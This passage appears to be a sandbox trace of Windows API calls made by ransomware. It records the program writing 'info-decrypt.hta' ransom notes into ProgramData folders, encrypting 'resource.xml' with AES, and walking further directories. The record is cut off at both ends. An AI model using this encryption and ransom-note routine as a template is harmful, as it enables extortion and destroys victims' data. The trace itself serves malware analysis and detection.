(dwNewMode=0x0, lpOldMode=0x691f2fc) returned 1 [0187.742] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f308) returned 1 [0187.742] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml", nBufferLength=0x105, lpBuffer=0x691edb0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml", lpFilePart=0x0) returned 0x64 [0187.742] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691edb8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\info-decrypt.hta", lpFilePart=0x0) returned 0x68 [0187.742] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f218) returned 1 [0187.742] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x691f294 | out: lpFileInformation=0x691f294*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0187.742] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f214) returned 1 [0187.742] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml", nBufferLength=0x105, lpBuffer=0x691edb0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml", lpFilePart=0x0) returned 0x64 [0187.742] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691ec58, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\info-decrypt.hta", lpFilePart=0x0) returned 0x68 [0187.742] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f14c) returned 1 [0187.743] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x45c [0187.743] GetFileType (hFile=0x45c) returned 0x1 [0187.743] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f148) returned 1 [0187.743] GetFileType (hFile=0x45c) returned 0x1 [0187.743] WriteFile (in: hFile=0x45c, lpBuffer=0x3644b78*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x691f210, lpOverlapped=0x0 | out: lpBuffer=0x3644b78*, lpNumberOfBytesWritten=0x691f210*=0x1000, lpOverlapped=0x0) returned 1 [0187.744] WriteFile (in: hFile=0x45c, lpBuffer=0x3644b78*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x691f1e4, lpOverlapped=0x0 | out: lpBuffer=0x3644b78*, lpNumberOfBytesWritten=0x691f1e4*=0x55e, lpOverlapped=0x0) returned 1 [0187.744] CloseHandle (hObject=0x45c) returned 1 [0187.745] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml", nBufferLength=0x105, lpBuffer=0x691edb8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml", lpFilePart=0x0) returned 0x64 [0187.745] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f264) returned 1 [0187.745] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml"), fInfoLevelId=0x0, lpFileInformation=0x3645b94 | out: lpFileInformation=0x3645b94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2a152a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xb5e9110, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xb2a152a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x5e8)) returned 1 [0187.745] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f260) returned 1 [0187.745] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml", nBufferLength=0x105, lpBuffer=0x691eca4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml", lpFilePart=0x0) returned 0x64 [0187.745] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f198) returned 1 [0187.745] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x45c [0187.745] GetFileType (hFile=0x45c) returned 0x1 [0187.745] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f194) returned 1 [0187.745] GetFileType (hFile=0x45c) returned 0x1 [0187.745] GetFileSize (in: hFile=0x45c, lpFileSizeHigh=0x691f2a0 | out: lpFileSizeHigh=0x691f2a0*=0x0) returned 0x5e8 [0187.745] ReadFile (in: hFile=0x45c, lpBuffer=0x3646418, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x691f24c, lpOverlapped=0x0 | out: lpBuffer=0x3646418*, lpNumberOfBytesRead=0x691f24c*=0x5e8, lpOverlapped=0x0) returned 1 [0187.780] CloseHandle (hObject=0x45c) returned 1 [0187.780] CryptAcquireContextW (in: phProv=0x691f1ec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x691f1ec*=0x66bb048) returned 1 [0187.781] CryptGenRandom (in: hProv=0x66bb048, dwLen=0x10, pbBuffer=0x3647adc | out: pbBuffer=0x3647adc) returned 1 [0189.047] CryptImportKey (in: hProv=0x66bb048, pbData=0x37ad2a4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x691f1bc | out: phKey=0x691f1bc*=0xb7f890) returned 1 [0189.047] CryptContextAddRef (hProv=0x66bb048, pdwReserved=0x0, dwFlags=0x0) returned 1 [0189.047] CryptContextAddRef (hProv=0x66bb048, pdwReserved=0x0, dwFlags=0x0) returned 1 [0189.048] CryptDuplicateKey (in: hKey=0xb7f890, pdwReserved=0x0, dwFlags=0x0, phKey=0x691f1ac | out: phKey=0x691f1ac*=0xb7f310) returned 1 [0189.048] CryptContextAddRef (hProv=0x66bb048, pdwReserved=0x0, dwFlags=0x0) returned 1 [0189.048] CryptSetKeyParam (hKey=0xb7f310, dwParam=0x4, pbData=0x37ad384*=0x1, dwFlags=0x0) returned 1 [0189.048] CryptSetKeyParam (hKey=0xb7f310, dwParam=0x1, pbData=0x37ad350, dwFlags=0x0) returned 1 [0189.048] CryptEncrypt (in: hKey=0xb7f310, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37ad394*, pdwDataLen=0x691f218*=0x5f0, dwBufLen=0x5f0 | out: pbData=0x37ad394*, pdwDataLen=0x691f218*=0x5f0) returned 1 [0189.048] CryptEncrypt (in: hKey=0xb7f310, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37ad9a8*, pdwDataLen=0x691f220*=0x0, dwBufLen=0x10 | out: pbData=0x37ad9a8*, pdwDataLen=0x691f220*=0x10) returned 1 [0189.049] CryptDestroyKey (hKey=0xb7f890) returned 1 [0189.049] CryptReleaseContext (hProv=0x66bb048, dwFlags=0x0) returned 1 [0189.050] CryptReleaseContext (hProv=0x66bb048, dwFlags=0x0) returned 1 [0189.050] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml", nBufferLength=0x105, lpBuffer=0x691ec90, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml", lpFilePart=0x0) returned 0x64 [0189.050] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f184) returned 1 [0189.050] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0189.052] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691dfc0) returned 1 [0189.052] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f42c) returned 1 [0189.052] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\DeviceSync", nBufferLength=0x105, lpBuffer=0x691ef34, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\DeviceSync", lpFilePart=0x0) returned 0x23 [0189.052] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\DeviceSync\\", nBufferLength=0x105, lpBuffer=0x691ef08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\DeviceSync\\", lpFilePart=0x0) returned 0x24 [0189.052] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\DeviceSync\\*", lpFindFileData=0x691f154 | out: lpFindFileData=0x691f154*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd789d88f, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7fbd0 [0192.865] FindNextFileW (in: hFindFile=0xb7fbd0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd789d88f, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0192.865] FindNextFileW (in: hFindFile=0xb7fbd0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd789d88f, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0192.865] FindClose (in: hFindFile=0xb7fbd0 | out: hFindFile=0xb7fbd0) returned 1 [0192.866] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3ec) returned 1 [0192.866] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3f8) returned 1 [0192.866] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f42c) returned 1 [0192.866] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\DeviceSync", nBufferLength=0x105, lpBuffer=0x691ef34, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\DeviceSync", lpFilePart=0x0) returned 0x23 [0192.866] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\DeviceSync\\", nBufferLength=0x105, lpBuffer=0x691ef08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\DeviceSync\\", lpFilePart=0x0) returned 0x24 [0192.866] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\DeviceSync\\*", lpFindFileData=0x691f154 | out: lpFindFileData=0x691f154*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd789d88f, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7fbd0 [0192.866] FindNextFileW (in: hFindFile=0xb7fbd0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd789d88f, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0192.867] FindNextFileW (in: hFindFile=0xb7fbd0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd789d88f, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0192.867] FindClose (in: hFindFile=0xb7fbd0 | out: hFindFile=0xb7fbd0) returned 1 [0192.867] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3ec) returned 1 [0192.867] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3f8) returned 1 [0192.867] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f42c) returned 1 [0192.867] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\DRM", nBufferLength=0x105, lpBuffer=0x691ef34, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\DRM", lpFilePart=0x0) returned 0x1c [0192.867] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\DRM\\", nBufferLength=0x105, lpBuffer=0x691ef08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\DRM\\", lpFilePart=0x0) returned 0x1d [0192.867] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\DRM\\*", lpFindFileData=0x691f154 | out: lpFindFileData=0x691f154*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd98f9f8, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7fbd0 [0192.868] FindNextFileW (in: hFindFile=0xb7fbd0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd98f9f8, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0192.868] FindNextFileW (in: hFindFile=0xb7fbd0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xba6f6d7d, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Server", cAlternateFileName="")) returned 1 [0192.868] FindNextFileW (in: hFindFile=0xb7fbd0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xba6f6d7d, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Server", cAlternateFileName="")) returned 0 [0192.868] FindClose (in: hFindFile=0xb7fbd0 | out: hFindFile=0xb7fbd0) returned 1 [0192.869] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3ec) returned 1 [0192.869] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3f8) returned 1 [0192.869] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f42c) returned 1 [0192.869] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\DRM", nBufferLength=0x105, lpBuffer=0x691ef34, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\DRM", lpFilePart=0x0) returned 0x1c [0192.869] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\DRM\\", nBufferLength=0x105, lpBuffer=0x691ef08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\DRM\\", lpFilePart=0x0) returned 0x1d [0192.869] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\DRM\\*", lpFindFileData=0x691f154 | out: lpFindFileData=0x691f154*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd98f9f8, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7fbd0 [0192.869] FindNextFileW (in: hFindFile=0xb7fbd0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd98f9f8, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0192.869] FindNextFileW (in: hFindFile=0xb7fbd0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xba6f6d7d, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Server", cAlternateFileName="")) returned 1 [0192.870] FindNextFileW (in: hFindFile=0xb7fbd0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0192.870] FindClose (in: hFindFile=0xb7fbd0 | out: hFindFile=0xb7fbd0) returned 1 [0192.870] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3ec) returned 1 [0192.870] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3f8) returned 1 [0192.870] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f3dc) returned 1 [0192.870] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\DRM\\Server", nBufferLength=0x105, lpBuffer=0x691eee4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\DRM\\Server", lpFilePart=0x0) returned 0x23 [0192.870] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\DRM\\Server\\", nBufferLength=0x105, lpBuffer=0x691eeb8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\DRM\\Server\\", lpFilePart=0x0) returned 0x24 [0192.870] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\DRM\\Server\\*", lpFindFileData=0x691f104 | out: lpFindFileData=0x691f104*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xba6f6d7d, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7fbd0 [0192.871] FindNextFileW (in: hFindFile=0xb7fbd0, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xba6f6d7d, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0192.871] FindNextFileW (in: hFindFile=0xb7fbd0, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xba6f6d7d, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0192.871] FindClose (in: hFindFile=0xb7fbd0 | out: hFindFile=0xb7fbd0) returned 1 [0192.871] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f39c) returned 1 [0192.871] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3a8) returned 1 [0192.871] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f3dc) returned 1 [0192.871] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\DRM\\Server", nBufferLength=0x105, lpBuffer=0x691eee4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\DRM\\Server", lpFilePart=0x0) returned 0x23 [0192.871] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\DRM\\Server\\", nBufferLength=0x105, lpBuffer=0x691eeb8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\DRM\\Server\\", lpFilePart=0x0) returned 0x24 [0192.871] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\DRM\\Server\\*", lpFindFileData=0x691f104 | out: lpFindFileData=0x691f104*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xba6f6d7d, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7fbd0 [0192.872] FindNextFileW (in: hFindFile=0xb7fbd0, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xba6f6d7d, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0192.872] FindNextFileW (in: hFindFile=0xb7fbd0, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xba6f6d7d, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0192.872] FindClose (in: hFindFile=0xb7fbd0 | out: hFindFile=0xb7fbd0) returned 1 [0192.872] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f39c) returned 1 [0192.872] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3a8) returned 1 [0192.872] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f42c) returned 1 [0192.872] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\eHome", nBufferLength=0x105, lpBuffer=0x691ef34, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\eHome", lpFilePart=0x0) returned 0x1e [0192.872] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\eHome\\", nBufferLength=0x105, lpBuffer=0x691ef08, lpFilePart=0x0 | out: 